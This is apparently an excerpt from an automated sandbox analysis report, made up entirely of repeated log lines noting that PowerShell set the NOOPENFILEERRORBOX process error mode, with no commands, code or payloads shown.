Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
